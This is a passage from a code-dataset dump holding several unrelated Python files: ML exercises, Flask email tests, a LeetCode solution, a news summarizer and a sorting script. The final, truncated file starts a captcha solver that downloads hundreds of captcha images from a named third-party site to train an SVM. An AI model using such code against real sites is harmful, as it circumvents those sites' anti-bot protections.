Comment out show() and remove \"\"\" comments below.\r\n\t\t\"\"\"\r\n\t\trcParams['animation.ffmpeg_path'] = '/FFMPEG/bin/ffmpeg'\r\n\t\tFFwriter = animation.FFMpegWriter()\r\n\t\tani.save('animation.mp4', writer = FFwriter, fps=30, extra_args=['-vcodec', 'libx264'])\r\n\t\t\"\"\"\r\n\t\tshow()\r\n\r\n\r\n\tdef update(self, i):\r\n\t\t\"\"\" Update variables and animation \"\"\"\r\n\t\tself.timeframe += 1\r\n\t\tself.solve_equations()\r\n\t\tself.time_text.set_text('t = %g s' %(self.dt*self.timeframe))\r\n\t\tself.line.set_ydata(self.varfunc())\r\n\t\treturn self.line, self.time_text,\r\n\r\nsolver = animate_and_solve(100, 'P')\r\nsolver.plot_animation()\r\n#solver.mass_check()\r\n","sub_path":"Alex_proj4_1D_different_method.py","file_name":"Alex_proj4_1D_different_method.py","file_ext":"py","file_size_in_byte":6213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"633845862","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 25 19:24:58 2017\n\n@author: minjiang\nPredict whether Titanic passengers survived using a decision tree,\nand use feature selection to find the best combination of features\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn import feature_selection\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import cross_val_score\n\n#Read in the data\ntitanic = pd.read_csv('http://biostat.mc.vanderbilt.edu/wiki/pub/Main/DataSets/titanic.txt')\n#Inspect the summary statistics of the data; note that some values are missing\n#titanic.info()\n\n#Separate the data features from the prediction target\nX = titanic.drop(['row.names', 'name', 'survived'], axis = 1)\ny = titanic['survived']\n\n#Fill in the missing data\n#X.info()\n#Use the mean to fill in missing ages\nX['age'].fillna(X['age'].mean(), inplace=True)\n#Fill the other missing values with 'UNKNOWN'\nX.fillna('UNKNOWN', inplace=True)\n\n#Split the original data, 25% for testing\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=33)\n\n#Convert the categorical features into feature vectors\nvec = DictVectorizer(sparse=False)\nX_train=vec.fit_transform(X_train.to_dict(orient='record'))\nX_test=vec.transform(X_test.to_dict(orient='record'))\n\n#Print the dimensionality of the processed feature vectors\nprint(len(vec.feature_names_))\n\n#Use all of the features\ndtc = DecisionTreeClassifier()\ndtc.fit(X_train, y_train)\ndtc_y_pred = dtc.predict(X_test)\nprint(dtc.score(X_test, y_test))\nprint(classification_report(dtc_y_pred, y_test))\n\n#Select the top 20% of features and use an identically configured decision tree\nfs = feature_selection.SelectPercentile(feature_selection.chi2, percentile=20)\nX_train_fs = fs.fit_transform(X_train, y_train)\ndtc.fit(X_train_fs, y_train)\nX_test_fs = fs.transform(X_test)\ndtc_y_pred = dtc.predict(X_test_fs)\nprint(dtc.score(X_test_fs, y_test))\nprint(classification_report(dtc_y_pred, y_test))\n\n#Use cross-validation to screen features at fixed percentile intervals\npercentiles = range(1, 100, 2)\nresults = []\n\nfor i in percentiles:\n    fs = feature_selection.SelectPercentile(feature_selection.chi2, percentile=i)\n    X_train_fs = fs.fit_transform(X_train, y_train)\n    scores = cross_val_score(dtc, X_train_fs, y_train, cv=5)\n    results.append(scores.mean())\nprint (results)\n\n#Find the feature-selection percentile that gives the best performance\nopt = results.index(max(results))\nprint('Optimal number of features %d' %percentiles[opt])\n\nplt.plot(percentiles, results)\nplt.xlabel('percentiles of features')\nplt.ylabel('accuracy')\nplt.show()\n\n#Use the best selected features (7%) with an identically configured decision tree\nfs = feature_selection.SelectPercentile(feature_selection.chi2, percentile=7)\nX_train_fs = fs.fit_transform(X_train, y_train)\ndtc.fit(X_train_fs, y_train)\nX_test_fs = fs.transform(X_test)\n
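#Editor's note -- a hedged sketch, not in the original script: to list which\n#columns the 7% filter kept (assuming vec.feature_names_ lines up with the\n#DictVectorizer output), one could run:\n#selected = [vec.feature_names_[j] for j in fs.get_support(indices=True)]\n#print(selected)\n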
dtc_y_pred = dtc.predict(X_test_fs)\nprint(dtc.score(X_test_fs, y_test))\nprint(classification_report(dtc_y_pred, y_test))\n","sub_path":"Tree_Titanic/Dtree_FS.py","file_name":"Dtree_FS.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"191826482","text":"# %%\n## Some helper functions\n\n# Compute the eigenvalues and eigenvectors of the covariance matrix\ndef eig_pca(data, method='cov'):\n    if method == 'corr':\n        matrix = np.corrcoef(data.T)\n    else:\n        matrix = np.cov(data.T)\n    lam, v = np.linalg.eig(matrix)\n    sorted_indices = np.argsort(-lam)\n    lam = lam[sorted_indices]\n    v = v[:, sorted_indices]\n    return lam, v\n\n# Scree plot\nimport matplotlib.pyplot as plt\ndef screeplot(subloc, variance, xlabels, title):\n    plt.subplot(subloc)\n    plt.plot(variance, marker='o', markerfacecolor='w')\n    plt.title(title)\n    plt.xticks(range(3), labels=xlabels)\n    plt.ylabel('Variance')\n\n# Pairwise scatter plot\nimport seaborn as sns\ndef pairplot(data, diag_kind='kde', hue=None):\n    sns.pairplot(data, diag_kind='kde', hue=hue)\n\n# %%\n## 7.1\n\n# Generate the data\nimport numpy as np\nnp.random.seed(42)\ndata = np.random.multivariate_normal(\n    [0, 0, 0], [[1,1,1],[1,4,1],[1,1,100]], 100)\n\n# Compute the eigenvalues and eigenvectors for each method\nlam1, v1 = eig_pca(data)\nlam2, v2 = eig_pca(data, 'corr')\nprint(lam1, '\\n\\n', v1, '\\n\\n', lam2, '\\n\\n', v2)\n\n# Compute the PC-scores\nimport pandas as pd\ndata_pca1 = pd.DataFrame(data.dot(v1), columns=['Comp1', 'Comp2', 'Comp3'])\ndata_pca2 = pd.DataFrame(data.dot(v2), columns=['Comp1', 'Comp2', 'Comp3'])\n\n# Draw the scree plots\nscreeplot(121, lam1, data_pca1.columns, \"cov_based\")\nscreeplot(122, lam2, data_pca1.columns, \"corr_based\")\n\n# Pairwise scatter plots of the principal components\npairplot(data_pca1)\npairplot(data_pca2)\n\n\n# %%\n## 7.4\n\n# Read the data\nfile_path = r\"C:\\Users\\Mac\\Desktop\\LDR\\pendigits.txt\"\ndigit = pd.read_table(file_path, header=0, sep=' ').values\nX = digit[:, :16]\n\n# Compute the variance of each variable\nfeature_var = np.var(X, axis=0)\nprint(feature_var)\n\n# PCA\nlam, v = eig_pca(X)\n\n# Choose a suitable number of principal components\nvar_cumratio = (lam / lam.sum()).cumsum()\nprint(\"The first \" + str(np.argmin(var_cumratio < 0.8) + 1) + \" components reach 80% of the variance\")\nprint(\"The first \" + str(np.argmin(var_cumratio < 0.9) + 1) + \" components reach 90% of the variance\")\n\n# Pairwise scatter plot of the principal components\nX_pca = pd.DataFrame(X.dot(v), columns=['Comp'+str(i+1) for i in range(16)])\npairplot(X_pca.iloc[:, :3])\n\n# %%\n## 7.9\n\n# Read the data (this dataset has 150 samples)\niris = sns.load_dataset(\"iris\")\nX = iris.drop(columns='species').values\n\n# PCA\nlam, v = eig_pca(X)\n\n# Compute the PC-scores\ndata = pd.DataFrame(X.dot(v), columns=['Comp'+str(i+1) for i in range(4)])\n\n# Pairwise scatter plot of the principal components\ndata = pd.concat([data, iris['species']], axis=1)\npairplot(data, hue='species')\n\n\n","sub_path":"多元统计/code/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"514041570","text":"from flask import json\nimport emailer\nimport parser\nimport unittest\n\n\nclass EmailerTestCase(unittest.TestCase):\n    \"\"\" Tests the emailer functionality \"\"\"\n\n    def setUp(self):\n        emailer.app.config['TESTING'] = True\n        self.app = emailer.app\n\n    def test_email_mandrill(self):\n        \"\"\" Tests an email send with Mandrill \"\"\"\n        self.app.config['DEFAULT_MAIL_SERVICE'] = \"mandrill\"\n        payload = {\n            'to': \"fake@example.com\",\n            'to_name': \"Ms. Fake\",\n            'from': \"noreply@uber.com\",\n            'from_name': \"Uber\",\n            'subject': \"A Message from Uber\",\n            'body': \"<html> <h1>Your Bill</h1> <p>$10</p> </html>
\"\n        }\n        with self.app.test_request_context('/email', method='POST'):\n            with self.app.test_client() as c:\n                response = c.post('/email', data=json.dumps(payload),\n                                  content_type='application/json')\n                response_data = json.loads(response.get_data())\n                assert response_data['success'] is True\n\n    def test_email_mailgun(self):\n        \"\"\" Tests an email send with Mailgun \"\"\"\n        self.app.config['DEFAULT_MAIL_SERVICE'] = \"mailgun\"\n        payload = {\n            'to': \"fake@example.com\",\n            'to_name': \"Ms. Fake\",\n            'from': \"noreply@uber.com\",\n            'from_name': \"Uber\",\n            'subject': \"A Message from Uber\",\n            'body': \"<html> <h1>Your Bill</h1> <p>$10</p> </html>
\"\n        }\n        with self.app.test_request_context('/email', method='POST'):\n            with self.app.test_client() as c:\n                response = c.post('/email', data=json.dumps(payload),\n                                  content_type='application/json')\n                response_data = json.loads(response.get_data())\n                assert response_data['success'] is True\n\n    def test_email_missing_field(self):\n        \"\"\" Tests an email send with a field missing \"\"\"\n        payload = {\n            'to': \"fake@example.com\",\n            'to_name': \"\", # missing field\n            'from': \"noreply@uber.com\",\n            'from_name': \"Uber\",\n            'subject': \"A Message from Uber\",\n            'body': \"<html> <h1>Your Bill</h1> <p>$10</p> </html>
\"\n        }\n        with self.app.test_request_context('/email', method='POST'):\n            with self.app.test_client() as c:\n                response = c.post('/email', data=json.dumps(payload),\n                                  content_type='application/json')\n                response_data = json.loads(response.get_data())\n                assert response_data['success'] is False\n                assert \"field\" in response_data['result']\n\n    def test_email_invalid_email(self):\n        \"\"\" Tests an email send with an invalid email \"\"\"\n        payload = {\n            'to': \"Ms. Fake\", # invalid email (to fields switched)\n            'to_name': \"fake@example.com\",\n            'from': \"noreply@uber.com\",\n            'from_name': \"Uber\",\n            'subject': \"A Message from Uber\",\n            'body': \"<html> <h1>Your Bill</h1> <p>$10</p> </html>
\"\n        }\n        with self.app.test_request_context('/email', method='POST'):\n            with self.app.test_client() as c:\n                response = c.post('/email', data=json.dumps(payload),\n                                  content_type='application/json')\n                response_data = json.loads(response.get_data())\n                assert response_data['success'] is False\n                assert \"email\" in response_data['result']\n\n\nclass ParserTestCase(unittest.TestCase):\n    \"\"\" Tests html stripping and email validation \"\"\"\n\n    def test_strip_simple(self):\n        \"\"\" Tests simple html stripping \"\"\"\n        text = \"<html> <h1>Your Bill</h1> <p>$10</p> </html>
\"\n cleaned_text = \"Your Bill $10\"\n assert parser.strip_html(text) == cleaned_text\n\n def test_strip_html_complex(self):\n \"\"\" Tests complex email stripping \"\"\"\n with open(\"testdata/test-strip-html.html\") as original:\n with open(\"testdata/test-strip-html-clean.txt\") as cleaned:\n dirty_text = original.read()\n cleaned_text = cleaned.read()\n assert cleaned_text == parser.strip_html(dirty_text)\n\n def test_validate_emails(self):\n \"\"\" Tests email validation \"\"\"\n email_tests = [(\"email\", False),\n (\"@email\", False),\n (\"_Steely.Morneau@uber.com\", True),\n (\".steely@uber.com\", False),\n (\"st..eely@uber.com\", False),\n (\"steely.@uber.com\", False),\n (\".@uber.com\", False),\n (\"Steely.Morneau5@uber.com\", True),\n (\"Steely Morneau@uber.com\", False)]\n\n for index, (email, is_valid) in enumerate(email_tests):\n assert parser.validate_email(email) == is_valid, (\n \"%s (%d); expected %s.\" % (email, index, is_valid))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"583084278","text":"import sys\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfilename = sys.argv[1]\ndf = pd.read_csv(filename, sep=',', engine='python')\nplt.figure(figsize=(16, 9))\nplt.title(filename.replace('\\\\', '/').split('/').pop())\nplt.ylabel('Temperature [°C]')\nplt.xlabel('Time [s]')\nplt.plot(df.iloc[:, 3], label='GPU')\nplt.plot(df.iloc[:, 13], label='CPU')\nplt.grid()\nplt.legend()\nplt.savefig('out.png')\n","sub_path":"temperaturePlot.py","file_name":"temperaturePlot.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"272630753","text":"\"\"\"\n1500. Design a File Sharing System\n\nWe will use a file-sharing system to share a very large file which consists of m small chunks with IDs from 1 to m.\n\nWhen users join the system, the system should assign a unique ID to them. The unique ID should be used once for each user, but when a user leaves the system, the ID can be reused again.\n\nUsers can request a certain chunk of the file, the system should return a list of IDs of all the users who own this chunk. If the user receive a non-empty list of IDs, they receive the requested chunk successfully.\n\n\nImplement the FileSharing class:\n\nFileSharing(int m) Initializes the object with a file of m chunks.\nint join(int[] ownedChunks): A new user joined the system owning some chunks of the file, the system should assign an id to the user which is the smallest positive integer not taken by any other user. Return the assigned id.\nvoid leave(int userID): The user with userID will leave the system, you cannot take file chunks from them anymore.\nint[] request(int userID, int chunkID): The user userID requested the file chunk with chunkID. 
Return a list of the IDs of all users that own this chunk sorted in ascending order.\n\n\nFollow-ups:\n\nWhat happens if the system identifies the user by their IP address instead of their unique ID and users disconnect and connect from the system with the same IP?\nIf the users in the system join and leave the system frequently without requesting any chunks, will your solution still be efficient?\nIf all each user join the system one time, request all files and then leave, will your solution still be efficient?\nIf the system will be used to share n files where the ith file consists of m[i], what are the changes you have to do?\n\n\nExample:\n\nInput:\n[\"FileSharing\",\"join\",\"join\",\"join\",\"request\",\"request\",\"leave\",\"request\",\"leave\",\"join\"]\n[[4],[[1,2]],[[2,3]],[[4]],[1,3],[2,2],[1],[2,1],[2],[[]]]\nOutput:\n[null,1,2,3,[2],[1,2],null,[],null,1]\nExplanation:\nFileSharing fileSharing = new FileSharing(4); // We use the system to share a file of 4 chunks.\n\nfileSharing.join([1, 2]); // A user who has chunks [1,2] joined the system, assign id = 1 to them and return 1.\n\nfileSharing.join([2, 3]); // A user who has chunks [2,3] joined the system, assign id = 2 to them and return 2.\n\nfileSharing.join([4]); // A user who has chunk [4] joined the system, assign id = 3 to them and return 3.\n\nfileSharing.request(1, 3); // The user with id = 1 requested the third file chunk, as only the user with id = 2 has the file, return [2] . Notice that user 1 now has chunks [1,2,3].\n\nfileSharing.request(2, 2); // The user with id = 2 requested the second file chunk, users with ids [1,2] have this chunk, thus we return [1,2].\n\nfileSharing.leave(1); // The user with id = 1 left the system, all the file chunks with them are no longer available for other users.\n\nfileSharing.request(2, 1); // The user with id = 2 requested the first file chunk, no one in the system has this chunk, we return empty list [].\n\nfileSharing.leave(2); // The user with id = 2 left the system.\n\nfileSharing.join([]); // A user who doesn't have any chunks joined the system, assign id = 1 to them and return 1. 
Notice that ids 1 and 2 are free and we can reuse them.\n\n\nConstraints:\n\n1 <= m <= 10^5\n0 <= ownedChunks.length <= min(100, m)\n1 <= ownedChunks[i] <= m\nValues of ownedChunks are unique.\n1 <= chunkID <= m\nuserID is guaranteed to be a user in the system if you assign the IDs correctly.\nAt most 10^4 calls will be made to join, leave and request.\nEach call to leave will have a matching call for join.\n\n\"\"\"\n\nfrom collections import defaultdict, deque\nfrom heapq import heapify, heappush, heappop\n\n\nclass FileSharing:\n\n def __init__(self, m: int):\n\n self.dict_ = {i: [] for i in range(1, m + 1)}\n self.user_db = {}\n self.count = 1\n self.queue = []\n\n def join(self, ownedChunks: List[int]) -> int:\n\n if (self.queue):\n user = self.queue.pop(0)\n\n else:\n user = self.count\n self.count += 1\n\n for i in ownedChunks:\n self.dict_[i].append(user)\n\n self.user_db[user] = ownedChunks\n return user\n\n def leave(self, userID: int) -> None:\n\n # print(userID,self.user_db.keys())\n\n for chunk in self.user_db[userID]:\n self.dict_[chunk].remove(userID)\n\n self.queue.append(userID)\n self.queue.sort()\n del self.user_db[userID]\n\n def request(self, userID: int, chunkID: int) -> List[int]:\n\n lst = self.dict_[chunkID].copy()\n lst.sort()\n\n if (lst != []):\n\n if not (userID in self.dict_[chunkID]):\n self.dict_[chunkID].append(userID)\n\n if not (chunkID in self.user_db[userID]):\n self.user_db[userID].append(chunkID)\n\n return lst\n\n\nclass FileSharing1:\n\n def __init__(self, m: int):\n\n self._chuckowen = [set() for _ in range(m + 1)]\n\n self._user = defaultdict(list)\n\n self._ids = set()\n\n self._idgenerator = [1]\n\n heapify(self._idgenerator)\n\n def _generateid(self) -> int:\n\n id = heappop(self._idgenerator)\n\n tmp = id + 1\n while tmp in self._ids and self._idgenerator and self._idgenerator[0] > tmp:\n tmp += 1\n\n if not self._idgenerator or self._idgenerator[0] > tmp:\n heappush(self._idgenerator, tmp)\n\n print(id, tmp)\n\n self._ids.add(id)\n\n return id\n\n def _removeid(self, id):\n\n self._ids.remove(id)\n\n heappush(self._idgenerator, id)\n\n def join(self, ownedChunks: list) -> int:\n\n id = self._generateid()\n\n self._user[id] = ownedChunks\n\n for c in ownedChunks:\n self._chuckowen[c].add(id)\n\n return id\n\n def leave(self, userID: int) -> None:\n\n print(userID)\n\n for c in self._user[userID]:\n self._chuckowen[c].remove(userID)\n\n del self._user[userID]\n\n self._removeid(userID)\n\n def request(self, userID: int, chunkID: int) -> list:\n\n tmp = sorted(list(self._chuckowen[chunkID]))\n\n if not tmp:\n return tmp\n\n self._chuckowen[chunkID].add(userID)\n self._user[userID].append(chunkID)\n\n return tmp\n\n # tmp = set(self._chuckowen[chunkID])\n\n # self._chuckowen[chunkID].add(userID)\n\n # self._user[userID].append(chunkID)\n\n # return sorted(list(tmp))\n\n\nif __name__ == '__main__':\n\n obj = FileSharing(14)\n\n res = obj.join([3,9,12,2,7,13,6,1,11,14])\n\n res = obj.leave(1)\n\n id1 = obj.join([2, 11])\n\n id2 = obj.join([14,10,3,2,13])\n\n id3 = obj.join([13])\n\n obj.leave(2)\n\n obj.leave(1)\n\n obj.leave(3)\n\n id = obj.join([14,12,1,2,9,5,8,4,6])\n\n obj.leave([1])","sub_path":"PythonLeetcode/leetcodeM/1500_DesignFileSharingSystem.py","file_name":"1500_DesignFileSharingSystem.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"35412211","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 03 12:52:03 2016\n\n@author: 
Daryl\n\"\"\"\n\nfrom __future__ import print_function\n\nimport pandas as pd\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.cross_validation import cross_val_score\n\ndef encode_target(df, target_column):\n df_mod = df.copy()\n targets = df_mod[target_column].unique()\n map_to_int = {name: n for n, name in enumerate(targets)}\n df_mod[\"Target\"] = df_mod[target_column].replace(map_to_int)\n return (df_mod, targets)\n \n \nif __name__ == \"__main__\":\n # Read modeled data to be used in classifier\n df = pd.read_csv(\"last6data.csv\", index_col=0)\n \n # Identify features for classifier\n features = ['HWDL', 'HGS', 'HGA', 'HRC', 'AWDL', 'AGS', 'AGA', 'ARC', \n 'H2hWDL', 'H2hGS', 'H2hGA', 'H2hRC']\n \n # Encode target column with integer values \n df, targets = encode_target(df, \"FTR\")\n y = df[\"Target\"]\n X = df[features]\n \n # Create Adaboost classifier and fit data\n dt = AdaBoostClassifier(algorithm='SAMME.R', base_estimator=None,\n learning_rate=0.5, n_estimators=50, random_state=None)\n dt.fit(X, y)\n \n # 10 fold cross validation for checking accuracy\n scores = cross_val_score(dt, X, y, cv=10)","sub_path":"Code/Final/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"12582943","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 8 17:44:04 2021\r\n\r\n@author: Sreeram Aditya\r\n\"\"\"\r\n\r\nimport tkinter as tk\r\nimport nltk\r\nfrom textblob import TextBlob\r\nfrom newspaper import Article\r\nnltk.download('punkt')\r\ndef summarize():\r\n url=utext.get('1.0',\"end\").strip()\r\n article=Article(url)\r\n\r\n article.download()\r\n article.parse()\r\n\r\n article.nlp()\r\n title.config(state='normal')\r\n author.config(state='normal')\r\n publication.config(state='normal')\r\n summary.config(state='normal')\r\n sentiment.config(state='normal')\r\n \r\n title.delete('1.0',\"end\")\r\n title.insert('1.0',article.title)\r\n author.delete('1.0',\"end\")\r\n author.insert('1.0',article.authors)\r\n publication.delete('1.0',\"end\")\r\n publication.insert('1.0',article.publish_date)\r\n summary.delete('1.0',\"end\")\r\n summary.insert('1.0',article.summary)\r\n \r\n analysis=TextBlob(article.text)\r\n sentiment.delete('1.0','end')\r\n sentiment.insert('1.0',f'Polarity:{analysis.polarity},Sentiment:{\"positive\" if analysis.polarity >0 else \"negative\" if analysis.polarity <0 else \"neutral\"}')\r\n #dont know why error\r\n \r\n title.config(state='disabled')\r\n \r\n author.config(state='disabled')\r\n publication.config(state='disabled')\r\n summary.config(state='disabled')\r\n sentiment.config(state='disabled')\r\n\r\n\r\n\r\nroot=tk.Tk()\r\nroot.title('News Summarizer')\r\nroot.geometry('1200x600')\r\n\r\ntlabel=tk.Label(root,text=\"Title\")\r\ntlabel.pack()\r\ntitle=tk.Text(root,height=1,width=140)\r\ntitle.config(state='disabled',bg='#808080')\r\ntitle.pack()\r\n\r\nalabel=tk.Label(root,text=\"Author\")\r\nalabel.pack()\r\nauthor=tk.Text(root,height=1,width=140)\r\nauthor.config(state='disabled',bg='#808080')\r\nauthor.pack()\r\n\r\nplabel=tk.Label(root,text=\"Publication 
Date\")\r\nplabel.pack()\r\npublication=tk.Text(root,height=1,width=140)\r\npublication.config(state='disabled',bg='#808080')\r\npublication.pack()\r\n\r\nslabel=tk.Label(root,text=\"Summary\")\r\nslabel.pack()\r\nsummary=tk.Text(root,height=20,width=140)\r\nsummary.config(state='disabled',bg='#808080')\r\nsummary.pack()\r\n\r\nselabel=tk.Label(root,text=\"Sentiment Analysis\")\r\nselabel.pack()\r\nsentiment=tk.Text(root,height=1,width=140)\r\nsentiment.config(state='disabled',bg='#808080')\r\nsentiment.pack()\r\n\r\nulabel=tk.Label(root,text=\"URL\")\r\nulabel.pack()\r\nutext=tk.Text(root,height=1,width=140)\r\n\r\nutext.pack()\r\n\r\nbtn=tk.Button(root,text=\"Summarize\",command=summarize)\r\n\r\nbtn.pack()\r\n\r\nroot.mainloop()\r\n\r\n\r\n\r\n","sub_path":"news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"463731276","text":"def MergeSort(ar):\n    if len(ar) > 1:\n        mid = len(ar)//2\n        L = ar[:mid]\n        R = ar[mid:]\n        \n        MergeSort(L)\n        MergeSort(R)\n\n        i = j = k = 0\n        #Passing elements to the temporary arrays\n        while i < len(L) and j < len(R):\n            if (int(L[i][1]), int(L[i][2])) <= (int(R[j][1]), int(R[j][2])):\n                ar[k] = L[i]\n                i+=1\n            else: \n                ar[k] = R[j]\n                j+=1\n            k+=1\n        #Checking whether any element is left over\n        while i < len(L):\n            ar[k] = L[i]\n            i+=1\n            k+=1\n        while j < len(R):\n            ar[k] = R[j]\n            j+=1\n            k+=1\n\nar = []\nn = int(input(\"Range: \"))\nfor i in range(n):\n    mkv= input(\"Name Movie: \").split()\n    ar.append(mkv)\nMergeSort(ar)\nfor i in ar:\n    print(''.join(i[0]), end=\" \") \n\n\n#INPUT\n#5\n#StarWars 2 1\n#Alien 1 57\n#ASpaceOdyssey 2 41\n#Matrix 2 30\n#BladeRunner 1 57\n\n#OUTPUT\n#Alien BladeRunner StarWars Matrix ASpaceOdyssey\n\n","sub_path":"ago-dic-2019/Jorge de Jesus Hernandez Vazquez/Practicas/Examenp1.py","file_name":"Examenp1.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"134405102","text":"#!/usr/bin/python\n\n#Develop a simple sequence processing script, \"wtools\", providing user interaction.\n#\"input.fas\" is processed to perform three simple sequence operations: 1. Calculate base counts, 2. Find the reverse complementary sequence, and 3. Search for the presence of a new short sequence.\nimport re #Import the re module first\ndef calculatenum():\t\t#Define the calculatenum function to count bases and write the result to result1.txt.\n\tsum_a=0\t\t\t\t#Initialize the count of 'A'; same below.\n\tsum_t=0\n\tsum_c=0\n\tsum_g=0\n\twith open('result1.txt','w') as result1 :\t\t\t\t\t\t#Open the output file \"result1.txt\"\n\t\twith open(\"input.fas\", \"r\", encoding=\"utf-8\") as file1:\t\t#Open the input file \"input.fas\"\n\t\t\tfor line1 in file1:\n\t\t\t\tif(\">\" in line1):\t#Skip the header row\n\t\t\t\t\tcontinue\n\t\t\t\tsum_a=line1.count(\"A\")+sum_a\t\t\t\t\t\t#Call the built-in function to count the number of each base.\n\t\t\t\tsum_t=line1.count(\"T\")+sum_t\n\t\t\t\tsum_c=line1.count(\"C\")+sum_c\n\t\t\t\tsum_g=line1.count(\"G\")+sum_g\n\t\t\tprint(\"The number of bases is:\",file=result1)\t\t\t#Print the number of each base to the output file\n\t\t\tprint(\"The number of A:\",sum_a,file=result1)\n\t\t\tprint(\"The number of T:\",sum_t,file=result1)\n\t\t\tprint(\"The number of C:\",sum_c,file=result1)\n\t\t\tprint(\"The number of G:\",sum_g,file=result1)\n\n#Finding the reverse complementary sequence\n#The following two functions are used to realize \"reverse complementarity of sequences\".\n
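#Editor's sketch, not part of the original script: the same reverse complement\n#could also be written with str.translate, e.g.\n#def revcomp(seq):\n#\treturn seq.upper().translate(str.maketrans(\"ATCG\", \"TAGC\"))[::-1]\n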
def complement(seq): \t\t\t\t#This function realizes base complementation.\n\tseq = seq.upper()\t\t\t\t#Replace with lowercase letters first, marking a base as already replaced to prevent double replacement.\n\tseq = seq.replace(\"A\",\"t\")\t\t#Call the built-in function \"replace\" to change A to t\n\tseq = seq.replace(\"T\",\"a\")\t\t#Call the built-in function \"replace\" to change T to a\n\tseq = seq.replace(\"C\",\"g\")\t\t#Call the built-in function \"replace\" to change C to g\n\tseq = seq.replace(\"G\",\"c\")\t\t#Call the built-in function \"replace\" to change G to c\n\treturn seq.upper()\n#Finally, replace all the replaced bases with capital letters.\n\ndef RevAndCom(): \n\twith open('result2.txt','w') as result2 :\t\t\t\t\t\t#Open the output file \"result2.txt\"\n\t\tprint(\"The Reverse complementary sequence:\",file=result2)\t#Write a header line to the output file\n\t\twith open(\"input.fas\", \"r\", encoding=\"utf-8\") as file2:\n\t\t\tfor line2 in file2:\n\t\t\t\tif(\">\" in line2):\t\t\t#Skip the header row\n\t\t\t\t\tcontinue\n\t\t\t\tnewline=complement(line2)[::-1]\t\t\t#Call the complement() function and reverse the string.\n\t\t\t\tprint(newline,file=result2)\n#Search for the existence of a new small sequence\ndef SearchSeq():\n\tprint(\"--\"*20)\n\tseq=input(\"Please input the sequence that you want to search:\")\n\twith open('result3.txt','w') as result3 :\t\t\t\t\t\t\t#Open the output file \"result3.txt\"\n\t\twith open(\"input.fas\", \"r\", encoding=\"utf-8\") as file3:\t\t\t#Open the input file \"input.fas\"\n\t\t\tline3=file3.readlines()\n\t\t\tline3=str(line3)\t#Make sure the matching object is a string.\n\t\t\ttmp=re.finditer(seq,line3)\n\t\t\tcount_match=0\t#Define a count variable to count the number of matches\n\t\t\tprint(\"The search results are as follows:\")\n\t\t\tfor i in tmp:\n\t\t\t\tcount_match=count_match+1 #Each iteration increases \"count_match\" by one.\n\t\t\t\tprint(i,file=result3)\n\t\t\tprint(\"The total number of matches is:\",count_match,file=result3)\t#Summary\n","sub_path":"wtools/wtools.py","file_name":"wtools.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"511541497","text":"# -*- coding: utf-8 -*-\nimport uuid\n\nimport os\nimport requests\nfrom PIL import Image\nfrom svmutil import *\n\nfrom utils.utils import huidu_JZ, _9_gg_JZ, remove_border, image_crop, print_image\n\nmapper = {\n    \"101.0\": \"A\",\n    \"102.0\": \"B\",\n    \"103.0\": \"C\",\n    \"104.0\": \"D\",\n    \"105.0\": \"E\",\n    \"106.0\": \"F\",\n    \"107.0\": \"G\",\n    \"108.0\": \"H\",\n    \"109.0\": \"I\",\n    \"1010.0\": \"J\",\n    \"1011.0\": \"K\",\n    \"1012.0\": \"L\",\n    \"1013.0\": \"M\",\n    \"1014.0\": \"N\",\n    \"1015.0\": \"O\",\n    \"1016.0\": \"P\",\n    \"1017.0\": \"Q\",\n    \"1018.0\": \"R\",\n    \"1019.0\": \"S\",\n    \"1020.0\": \"T\",\n    \"1021.0\": \"U\",\n    \"1022.0\": \"V\",\n    \"1023.0\": \"W\",\n    \"1024.0\": \"X\",\n    \"1025.0\": \"Y\",\n    \"1026.0\": \"Z\",\n    \"0.0\": \"0\",\n    \"1.0\": \"1\",\n    \"2.0\": \"2\",\n    \"3.0\": \"3\",\n    \"4.0\": \"4\",\n    \"5.0\": \"5\",\n    \"6.0\": \"6\",\n    \"7.0\": \"7\",\n    \"8.0\": \"8\",\n    \"9.0\": \"9\",\n}\n\n\ndef load_new_image():\n    \"\"\"\n    Download new captcha images\n    :return:\n    \"\"\"\n    for i in range(500):\n        # Download a new image\n        response = requests.get(\n            url=\"http://bm.e21cn.com/func/checkcode.ashx\"\n        )\n        
